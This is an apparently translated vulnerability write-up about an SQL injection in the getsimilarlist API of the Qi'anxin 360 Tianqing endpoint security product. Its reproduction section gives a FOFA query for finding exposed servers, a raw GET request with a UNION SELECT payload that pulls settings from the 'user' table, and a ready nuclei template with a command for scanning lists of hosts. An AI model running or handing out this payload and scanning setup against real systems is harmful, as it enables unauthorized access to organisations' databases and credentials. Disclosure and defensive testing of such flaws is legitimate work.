Qi'anxin 360 Tianqing's getsimilarlist has a SQL injection vulnerability

Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.

1. Product description

Qianxin Tianqing is a terminal security management system (referred to as "Tianqing") product of Qianxin Group dedicated to integrated terminal security solutions. Through the "systematic defense, digital operation" approach, we help government and enterprise customers accurately identify, protect and supervise terminals, and ensure that these terminals can access data and business in a trustworthy, secure and compliant manner at any time [1]. [2] Tianqing is built on Qi’anxin’s new “Trantuo” terminal security platform, which integrates high-performance virus scanning, vulnerability protection, active defense engines, and deeply integrates innovative technologies such as threat intelligence, big data analysis, and security visualization. Through the system Compliance and reinforcement, threat prevention and detection, operation and maintenance control and audit, terminal data leakage prevention, unified management and operation and other functions help government and enterprise customers build sustained and effective terminal security capabilities.

2. Vulnerability description

Qi'anxin 360 Tianqing's getsimilarlist has a SQL injection vulnerability.

3. Vulnerability Recurrence

fofa: banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" | | body="Expired or unauthorized, please contact 4008-136-360 to purchase"

1. Manual reproduction

LITTLE

GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json

BURP screenshot

2. Automated recurrence

①nulei scan

yaml

id: qianxin-360-tianqing-getsimilarlist-sqli-rce

info:
  name: qianxin-360-tianqing-getsimilarlist-sqli-rce
  author: m0be1
  severity: high
  tags: qianxin,sqli,iot
  description: 奇安信360天擎getsimilarlist存在SQL注入漏洞
  metadata: 
    fofa-query: banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
        Host:
        User-Agent: Mozilla/5.0 

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words: 
          - "list"
          - "total"
          - "reason\":\"success"
        part: body 
        condition: and

      - type: word
        part: header
        words: 
          - "application/json" 

nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats

②Xiaolong POC detection

Xiaolong's POC test passes Hala Shao

Tool download address

Xiaolong POC portal: Xiaolong POC tool